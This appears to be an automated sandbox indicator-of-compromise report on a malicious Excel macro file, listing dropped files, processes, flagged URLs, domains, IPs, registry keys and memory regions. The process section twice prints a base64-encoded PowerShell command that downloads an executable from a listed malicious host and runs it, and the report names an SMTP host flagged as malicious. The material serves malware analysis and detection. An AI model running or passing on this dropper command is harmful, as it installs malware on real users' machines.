IOCReport

loading gif

Files

File Path
Type
Category
Malicious
MV TRIADES.xlsm
Microsoft Excel 2007+
initial sample
 malicious
C:\Users\user\AppData\Roaming\tNDFx.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\Desktop\~$MV TRIADES.xlsm
data
dropped
 malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, 58596 bytes, 1 file
dropped
 clean
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
 clean
C:\Users\user\AppData\Local\ConsoleApp1\tNDFx.exe_Url_1w40bkugt4lbn414pfn202m3aujsqqra\7.926.901.773\qf3mddhz.newcfg
XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
modified
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\625B6235.jpg
PNG image data, 1243 x 610, 8-bit/color RGBA, non-interlaced
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEF21AB2.png
PNG image data, 225 x 225, 8-bit colormap, non-interlaced
dropped
 clean
C:\Users\user\AppData\Local\Temp\Cab9934.tmp
Microsoft Cabinet archive data, 58596 bytes, 1 file
dropped
 clean
C:\Users\user\AppData\Local\Temp\Tar9935.tmp
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SFY2ZDAX72H3NDC9G39.temp
data
dropped
 clean

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
 malicious
C:\Windows\System32\cmd.exe
cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
 malicious
C:\Users\user\AppData\Roaming\tNDFx.exe
'C:\Users\user\AppData\Roaming\tNDFx.exe'
malicious
C:\Windows\SysWOW64\cmd.exe
'C:\Windows\System32\cmd.exe' /c timeout 1
 malicious
C:\Users\user\AppData\Roaming\tNDFx.exe
C:\Users\user\AppData\Roaming\tNDFx.exe
 malicious
C:\Users\user\AppData\Roaming\tNDFx.exe
C:\Users\user\AppData\Roaming\tNDFx.exe
 malicious
C:\Windows\SysWOW64\timeout.exe
timeout 1
 clean

URLs

Name
IP
Malicious
http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-
unknown
 malicious
http://specfloors.net/dev/income
unknown
 malicious
http://specfloors.net/dev/income.exe
107.180.99.252
 malicious
http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html
172.67.176.78
 malicious
http://specfloors.net/dev/income.exePE
unknown
 malicious
http://liverpoolsupporters9.com
unknown
 malicious
http://specfloors.net
unknown
 malicious
http://127.0.0.1:HTTP/1.1
unknown
 clean
http://DynDns.comDynDNS
unknown
 clean
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
unknown
 clean
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
unknown
 clean
http://crl.entrust.net/server1.crl0
unknown
 clean
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
unknown
 clean
http://ocsp.entrust.net03
unknown
 clean
http://smtp.jiratane.com
unknown
 clean
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
unknown
 clean
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
 clean
https://www.liverpool.com/liverpool-fc-news/features/
unknown
 clean
http://www.diginotar.nl/cps/pkioverheid0
unknown
 clean
https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
unknown
 clean
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
unknown
 clean
http://crl3.dJ
unknown
 clean
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
 clean
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
unknown
 clean
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
 clean
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
unknown
 clean
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
unknown
 clean
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
unknown
 clean
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
unknown
 clean
http://jEOkvI.com
unknown
 clean
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
unknown
 clean
http://www.piriform.com/ccleaner
unknown
 clean
https://api.ipify.org%GETMozilla/5.0
unknown
 clean
https://i2-prod.live
unknown
 clean
http://www.%s.comPA
unknown
 clean
https://oMAWpB8PlZYBRN.org
unknown
 clean
https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
unknown
 clean
http://ocsp.entrust.net0D
unknown
 clean
https://www.liverpool.com/all-about/steven-gerrard
unknown
 clean
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
 clean
https://secure.comodo.com/CPS0
unknown
 clean
https://api.ipify.org%
unknown
 clean
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
unknown
 clean
http://servername/isapibackend.dll
unknown
 clean
http://crl.entrust.net/2048ca.crl0
unknown
 clean
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
unknown
 clean
There are 36 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
smtp.jiratane.com
198.54.116.63
 malicious
specfloors.net
107.180.99.252
 clean
liverpoolsupporters9.com
172.67.176.78
 clean

IPs

IP
Domain
Country
Malicious
198.54.116.63
smtp.jiratane.com
United States
malicious
172.67.176.78
liverpoolsupporters9.com
United States
clean
107.180.99.252
specfloors.net
United States
clean

Registry

Path
Value
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ux1
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
MTTT
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
VBAFiles
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ReviewToken
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ED49E
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
DefaultSheetR2L
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
UseSystemSeparators
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ThousandsSeparator
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
DecimalSeparator
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
gb1
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Max Display
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Max Display
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 1
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 2
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 3
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 4
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 5
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 6
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 7
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 8
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 9
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 10
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 11
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 12
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 13
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 14
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 15
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 16
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 17
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 18
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 19
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 20
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
F384F
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Max Display
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Max Display
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 1
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 2
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 3
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 4
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 5
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 6
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 7
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 8
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 9
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 10
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 11
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 12
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 13
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 14
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 15
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 16
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 17
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 18
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 19
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 20
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
F3B6B
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
LastPurgeTime
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
1033
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
1033
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
EXCELFiles
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ProductFiles
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_3082
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_3082
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_1036
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_1036
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_1033
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_1033
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_3082
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_3082
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_1036
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_1036
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_1033
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
SpellingAndGrammarFiles_1033
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ProductFiles
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ProductFiles
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ProductFiles
 clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ProductFiles
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableFileTracing
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableConsoleTracing
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileTracingMask
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ConsoleTracingMask
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MaxFileSize
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileDirectory
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableFileTracing
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableConsoleTracing
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileTracingMask
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ConsoleTracingMask
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MaxFileSize
 clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileDirectory
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
EnableFileTracing
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
EnableConsoleTracing
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
FileTracingMask
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
ConsoleTracingMask
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
MaxFileSize
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
FileDirectory
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
EnableFileTracing
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
EnableConsoleTracing
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
FileTracingMask
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
ConsoleTracingMask
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
MaxFileSize
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
FileDirectory
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
Blob
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
Blob
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
Blob
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
Blob
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
Blob
 clean
C:\Users\user\AppData\Roaming\tNDFx.exe
Blob
 clean
There are 97 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
unkown
page execute and read and write
 malicious
226B000
unkown
page read and write
 malicious
221A000
unkown
page read and write
 malicious
2191000
unkown
page read and write
 malicious
2BD1000
unkown
page read and write
 malicious
6A8F000
unkown
page read and write
 malicious
5A0000
unkown
page read and write
 clean
2EB8000
unkown
page read and write
 clean
6B0000
unkown
page read and write
 clean
D00000
unkown
page readonly
 clean
2EF0000
unkown
page read and write
 clean
730000
unkown
page read and write
 clean
7E0000
unkown
page read and write
 clean
BAF000
unkown
page read and write
 clean
328000
heap default
page read and write
 clean
385000
unkown
page read and write
 clean
140000
unkown
page write copy
 clean
4D70000
unkown
page readonly
 clean
6B0000
unkown
page read and write
 clean
720000
unkown
page read and write
 clean
3AE000
unkown
page read and write
 clean
8E0000
unkown image
page readonly
 clean
385000
unkown
page read and write
 clean
8E2000
unkown image
page execute read
 clean
385000
unkown
page read and write
 clean
357D000
unkown
page read and write
 clean
250000
unkown
page read and write
 clean
830000
unkown
page read and write
 clean
695000
unkown
page read and write
 clean
7D0000
unkown
page read and write
 clean
5720000
unkown
page read and write
 clean
850000
unkown
page readonly
 clean
337000
unkown
page read and write
 clean
1BD000
unkown
page execute and read and write
 clean
837000
unkown
page read and write
 clean
28B0000
unkown
page read and write
 clean
3710000
unkown
page read and write
 clean
568C000
unkown
page read and write
 clean
28B0000
unkown
page read and write
 clean
2AAF000
unkown
page read and write
 clean
5712000
unkown
page read and write
 clean
690000
unkown
page read and write
 clean
837000
unkown
page read and write
 clean
3929000
unkown
page read and write
 clean
1CBF0000
unkown
page read and write
 clean
7FF001F0000
unkown
page execute and read and write
 clean
385000
unkown
page read and write
 clean
590000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
3576000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
2E09000
unkown
page read and write
 clean
5EE000
unkown
page read and write
 clean
E0000
unkown
page read and write
 clean
569F000
unkown
page read and write
 clean
1A5000
unkown
page execute and read and write
 clean
385000
unkown
page read and write
 clean
3C5000
unkown
page read and write
 clean
240000
unkown
page read and write
 clean
518E000
stack
page read and write
 clean
695000
unkown
page read and write
 clean
590000
unkown
page read and write
 clean
2C0000
unkown
page read and write
 clean
1B60000
unkown
page write copy
 clean
3AF000
unkown
page read and write
 clean
390B000
unkown
page read and write
 clean
2E12000
unkown
page read and write
 clean
7E0000
unkown
page read and write
 clean
7DE000
unkown
page read and write
 clean
830000
unkown
page read and write
 clean
7E8000
unkown
page read and write
 clean
695000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
FFF30000
unkown
page execute and read and write
 clean
3953000
unkown
page read and write
 clean
23D000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
6D0000
unkown
page read and write
 clean
385000
unkown
page read and write
 clean
385000
unkown
page read and write
 clean
3509000
unkown
page read and write
 clean
150000
unkown
page read and write
 clean
3C8000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
7FF00105000
unkown
page read and write
 clean
3B5000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
45F0000
unkown
page readonly
 clean
385000
unkown
page read and write
 clean
830000
unkown
page read and write
 clean
598E000
unkown
page read and write
 clean
28B0000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
8F2000
unkown image
page readonly
 clean
28B0000
unkown
page read and write
 clean
590000
unkown
page read and write
 clean
20BE000
unkown
page read and write
 clean
837000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
830000
unkown
page read and write
 clean
53DE000
unkown
page read and write
 clean
7FF0010A000
unkown
page execute and read and write
 clean
AC7000
heap default
page read and write
 clean
12C000
unkown
page read and write
 clean
2F0000
unkown
page read and write
 clean
B0D000
heap default
page read and write
 clean
7FF001C0000
unkown
page read and write
 clean
4F7000
heap default
page read and write
 clean
72B000
unkown
page read and write
 clean
22CE000
unkown
page read and write
 clean
1E00000
unkown
page readonly
 clean
385000
unkown
page read and write
 clean
3503000
unkown
page read and write
 clean
114000
heap private
page read and write
 clean
28B0000
unkown
page read and write
 clean
3850000
unkown
page read and write
 clean
690000
unkown
page read and write
 clean
695000
unkown
page read and write
 clean
3506000
unkown
page read and write
 clean
34CA000
unkown
page read and write
 clean
3137000
unkown
page read and write
 clean
3045000
unkown
page read and write
 clean
2E28000
unkown
page read and write
 clean
720000
unkown
page read and write
 clean
20A000
unkown
page read and write
 clean
385000
unkown
page read and write
 clean
8E0000
unkown image
page readonly
 clean
240A000
unkown
page read and write
 clean
397E000
unkown
page read and write
 clean
5E1F000
stack
page read and write
 clean
5A0000
unkown
page read and write
 clean
1B430000
unkown
page read and write
 clean
720000
unkown
page read and write
 clean
1CBF0000
unkown
page read and write
 clean
58E8000
unkown
page read and write
 clean
6850000
heap private
page read and write
 clean
731000
unkown
page read and write
 clean
2F7D000
unkown
page read and write
 clean
34B7000
unkown
page read and write
 clean
78D000
unkown
page read and write
 clean
880000
heap private
page execute and read and write
 clean
3988000
unkown
page read and write
 clean
385000
unkown
page read and write
 clean
38CD000
unkown
page read and write
 clean
720000
unkown
page read and write
 clean
695000
unkown
page read and write
 clean
2B10000
unkown
page read and write
 clean
1B4DB000
unkown
page read and write
 clean
28B0000
unkown
page read and write
 clean
2E51000
unkown
page read and write
 clean
830000
unkown
page read and write
 clean
5251000
unkown
page read and write
 clean
53F000
heap default
page read and write
 clean
34C4000
unkown
page read and write
 clean
837000
unkown
page read and write
 clean
1B8E0000
unkown
page read and write
 clean
56AC000
unkown
page read and write
 clean
42DD000
unkown
page read and write
 clean
6D0000
unkown
page read and write
 clean
837000
unkown
page read and write
 clean
3101000
unkown
page read and write
 clean
690000
unkown
page read and write
 clean
690000
unkown
page read and write
 clean
7E0000
unkown
page read and write
 clean
690000
unkown
page readonly
 clean
6D2000
unkown
page read and write
 clean
830000
unkown
page read and write
 clean
28B0000
unkown
page read and write
 clean
20D0000
unkown
page read and write
 clean
590000
unkown
page read and write
 clean
4F20000
unkown
page readonly
 clean
8E0000
unkown image
page readonly
 clean
182000
unkown
page read and write
 clean
4A4000
heap default
page read and write
 clean
1BAAE000
unkown
page read and write
 clean
28B0000
unkown
page read and write
 clean
2F40000
unkown
page read and write
 clean
38E9000
unkown
page read and write
 clean
1F40000
unkown
page readonly
 clean
38B000
unkown
page read and write
 clean
5D0000
heap default
page read and write
 clean
3934000
unkown
page read and write
 clean
6D0000
unkown
page read and write
 clean
347000
heap default
page read and write
 clean
6C0000
heap private
page read and write
 clean
7FF0004C000
unkown
page execute and read and write
 clean
69AE000
stack
page read and write
 clean
1B820000
unkown
page write copy
 clean
7FF001D0000
unkown
page execute and read and write
 clean
34CD000
unkown
page read and write
 clean
2ED8000
unkown
page read and write
 clean
56CA000
unkown
page read and write
 clean
163000
unkown
page execute and read and write
 clean
7D0000
unkown
page read and write
 clean
80000
unkown
page read and write
 clean
28B0000
unkown
page read and write
 clean
7D44000
heap private
page read and write
 clean
B4000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
6D0000
unkown
page read and write
 clean
28B0000
unkown
page read and write
 clean
695000
unkown
page read and write
 clean
720000
unkown
page read and write
 clean
3896000
unkown
page read and write
 clean
4FC000
heap default
page read and write
 clean
730000
unkown
page read and write
 clean
1FC0000
unkown
page write copy
 clean
7FF00100000
unkown
page read and write
 clean
7FF00190000
unkown
page execute and read and write
 clean
1DBB000
heap private
page read and write
 clean
1E10000
unkown
page readonly
 clean
507E000
unkown
page read and write
 clean
38DF000
unkown
page read and write
 clean
2414000
unkown
page read and write
 clean
7FFFFF00000
unkown
page execute and read and write
 clean
385000
unkown
page read and write
 clean
3B0000
unkown
page readonly
 clean
730000
unkown
page read and write
 clean
6D0000
unkown
page read and write
 clean
690000
unkown
page read and write
 clean
3C1000
unkown
page read and write
 clean
1A2000
unkown
page read and write
 clean
7D0000
unkown
page read and write
 clean
19D000
stack
page read and write
 clean
2E92000
unkown
page read and write
 clean
9C0000
unkown
page read and write
 clean
34E0000
unkown
page read and write
 clean
60000
unkown
page readonly
 clean
593000
unkown
page read and write
 clean
17A000
unkown
page read and write
 clean
721000
unkown
page read and write
 clean
3C1000
unkown
page read and write
 clean
2C0F000
unkown
page read and write
 clean
690000
unkown
page read and write
 clean
6A0000
unkown
page read and write
 clean
1BD0000
unkown
page read and write
 clean
1D10000
unkown
page readonly
 clean
5CBF000
unkown
page read and write
 clean
36DB000
unkown
page read and write
 clean
1D60000
heap private
page read and write
 clean
12D41000
unkown
page read and write
 clean
FFF20000
unkown
page execute and read and write
 clean
28B0000
unkown
page read and write
 clean
310E000
unkown
page read and write
 clean
45EF000
unkown
page read and write
 clean
2E2E000
unkown
page read and write
 clean
1B0000
unkown
page read and write
 clean
480000
heap default
page read and write
 clean
380000
unkown
page read and write
 clean
392D000
unkown
page read and write
 clean
8E2000
unkown image
page execute read
 clean
2B20000
unkown
page readonly
 clean
690000
unkown
page read and write
 clean
385000
unkown
page read and write
 clean
695000
unkown
page read and write
 clean
D0000
unkown
page readonly
 clean
830000
unkown
page read and write
 clean
56CA000
unkown
page read and write
 clean
590000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
1B6000
unkown
page read and write
 clean
F0000
unkown
page read and write
 clean
56D1000
unkown
page read and write
 clean
8E0000
unkown image
page readonly
 clean
176000
unkown
page read and write
 clean
385000
unkown
page read and write
 clean
4C0000
heap default
page read and write
 clean
2D0000
unkown
page read and write
 clean
4A24000
heap private
page read and write
 clean
2EAB000
unkown
page read and write
 clean
6A2E000
unkown
page read and write
 clean
6B0000
unkown
page read and write
 clean
491E000
unkown
page read and write
 clean
5620000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
212000
unkown
page read and write
 clean
386000
unkown
page read and write
 clean
360000
unkown
page execute and read and write
 clean
380000
unkown
page read and write
 clean
486F000
stack
page read and write
 clean
3060000
unkown
page read and write
 clean
38E6000
unkown
page read and write
 clean
12CE1000
unkown
page read and write
 clean
20000
heap private
page read and write
 clean
7FF001E0000
unkown
page read and write
 clean
5230000
unkown
page read and write
 clean
740000
unkown
page read and write
 clean
1B9E0000
unkown
page readonly
 clean
4490000
unkown
page readonly
 clean
2404000
unkown
page read and write
 clean
5F0000
unkown
page readonly
 clean
830000
unkown
page read and write
 clean
532000
heap default
page read and write
 clean
5DBC000
unkown
page read and write
 clean
2AB0000
unkown
page readonly
 clean
837000
unkown
page read and write
 clean
1CBF0000
unkown
page read and write
 clean
280000
unkown
page write copy
 clean
637F000
unkown
page read and write
 clean
210000
heap private
page read and write
 clean
6D0000
unkown
page read and write
 clean
2400000
unkown
page read and write
 clean
830000
unkown
page read and write
 clean
8E2000
unkown image
page execute read
 clean
672E000
stack
page read and write
 clean
8CE000
unkown
page read and write
 clean
71D000
unkown
page read and write
 clean
2C2F000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
28B0000
unkown
page read and write
 clean
1E0000
unkown
page execute and read and write
 clean
692000
unkown
page read and write
 clean
AC0000
heap default
page read and write
 clean
386000
heap default
page read and write
 clean
1CBF0000
unkown
page read and write
 clean
A80000
unkown
page readonly
 clean
228F000
stack
page read and write
 clean
34DA000
unkown
page read and write
 clean
22E9000
unkown
page read and write
 clean
380000
unkown
page read and write
 clean
3A8000
unkown
page read and write
 clean
1CBF0000
unkown
page read and write
 clean
218F000
unkown
page read and write
 clean
200000
heap private
page execute and read and write
 clean
8C0000
unkown
page read and write
 clean
D0000
unkown
page readonly
 clean
730000
unkown
page read and write
 clean
720000
unkown
page read and write
 clean
880000
unkown
page read and write
 clean
460000
unkown
page execute and read and write
 clean
690000
unkown
page read and write
 clean
28B0000
unkown
page read and write
 clean
6B0000
unkown
page read and write
 clean
80000
unkown
page readonly
 clean
5C0000
unkown
page read and write
 clean
140000
unkown
page readonly
 clean
830000
unkown
page read and write
 clean
2F5E000
unkown
page read and write
 clean
7D0000
unkown
page execute and read and write
 clean
186000
unkown
page execute and read and write
 clean
3BC000
unkown
page read and write
 clean
830000
unkown
page read and write
 clean
690000
unkown
page read and write
 clean
130000
unkown
page read and write
 clean
20000
unkown
page read and write
 clean
830000
unkown
page read and write
 clean
B00000
heap default
page read and write
 clean
4A20000
heap private
page read and write
 clean
F4000
heap private
page read and write
 clean
830000
unkown
page read and write
 clean
7D80000
unkown
page read and write
 clean
2FAA000
unkown
page read and write
 clean
695000
unkown
page read and write
 clean
2F05000
unkown
page read and write
 clean
1B44C000
unkown
page read and write
 clean
38EC000
unkown
page read and write
 clean
22C9000
unkown
page read and write
 clean
34C7000
unkown
page read and write
 clean
385000
unkown
page read and write
 clean
23EF000
unkown
page read and write
 clean
3A2000
heap default
page read and write
 clean
2E3E000
unkown
page read and write
 clean
56D1000
unkown
page read and write
 clean
2E2B000
unkown
page read and write
 clean
387000
unkown
page read and write
 clean
38A6000
unkown
page read and write
 clean
5B7000
heap private
page read and write
